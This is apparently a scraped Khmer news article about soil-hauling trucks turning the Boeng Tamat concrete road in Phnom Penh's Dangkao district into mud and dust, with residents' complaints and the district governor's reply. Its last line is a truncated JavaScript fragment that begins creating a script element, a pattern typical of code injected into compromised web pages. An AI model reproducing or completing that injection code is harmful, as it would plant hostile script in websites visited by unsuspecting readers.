រថយន្តដឹកដីជាច្រើនគ្រឿងកំពុងបំផ្លាញផ្លូវបេតុងបឹងតាម៉ាតអោយក្លាយទៅជាភក់ជ្រាំមើលលែងយល់
ភ្នំពេញ៖ ប្រជាពលរដ្ឋរស់នៅក្នុងភូមិសំបួរ សង្កាត់ដង្កោ ខណ្ឌដង្កោ ដែលរស់នៅតាមបណ្ដោយផ្លូវបេតុងបឹងតាម៉ាត នឹង អ្នកធ្វើដំណើរ មានការរអ៊ូរទ្រាំមយ៉ាងខ្លាំងទៅលើកំណាត់ផ្លូវមួយខ្សែនេះ។
ប្រភពដដែលបានបបន្ដទៀតថានាពេលសព្វថ្ងៃផ្លូវមួយខ្សែនេះត្រូវបានចរាចរដោយរថយន្ដដឹកដីយ៉ាងគគ្រឹក
គគ្រេង ដែលបង្ករអោយមានការធ្លាក់អាចម៍ដីរពាត់រពាយពាស់ពេញផ្លូវ ដែលបណ្ដាលអោយហុយឡើងសំពោងពេលដែលគ្មានការស្រោចទឹកឬភ្លៀង។ រាល់ពេលមានភ្លៀងធ្លាក់ ឬក៍ស្រោចទឹកវិញបែរជាធ្វើអោយមានការពិបាកក្នុងការធ្វើដំណើរទៅវិញព្រោះដោយសារមានស្ថានភាពរអិលខ្លាំង ប្រភពដដែលបានបញ្ជាក់បន្ថែមថាកន្លងផ្លូវនេះមានអ្នកដំណើរជិះម៉ូតូដួលជាញឹកញាប់មកហើយដោយសារតែផ្លូវមួយនេះបានប្រែក្លាយពីផ្លូវបេតុង មកក្លាយជាផ្លូវរភក់ជ្រាំរអិល មើលលែងយល់។ ប្រជាពលរដ្ឋមានការសំណូមពរ យ៉ាងទទូចអោយអាជ្ញារធរខណ្ឌដង្កោមេត្តាជួយពិនិត្យទៅលើបញ្ហានេះផង។
បើតាមការបញ្ជាក់ពីលោក នុត ពុធដារ៉ា អភិបាលខណ្ឌដង្កោតាមរយៈទូរស័ព្ទយ៉ាងខ្លីថា លោកលោកនឹងចាត់ចែងអោយលោក អភិបាលរងខណ្ឌចាត់ចែងទៅលើបញ្ហានេះ។
var d=document;var s=d.createElement(‘script’);